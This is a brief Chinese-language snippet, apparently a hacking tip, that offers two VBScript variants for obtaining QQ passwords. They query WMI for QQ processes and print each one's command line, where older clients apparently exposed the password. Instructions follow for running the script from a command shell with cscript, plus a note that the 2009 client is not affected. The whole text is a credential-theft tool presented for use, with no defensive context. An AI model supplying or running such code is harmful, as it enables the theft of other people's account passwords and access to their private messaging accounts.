代码:
for each i in getobject ("winmgmts:\\.\root\cimv2").execquery("select * from win32_process where name like '%qq%'")
inputbox "","",i.commandline
next
cmdshell下得到qq密码代码:
for each i in getobject ("winmgmts:\\.\root\cimv2").execquery("select * from win32_process where name like '%qq%'")
Wscript.echo "","",i.commandline
next
用法:cscript.exe *.vbs(上面的不用,直接运行)
09版的不支持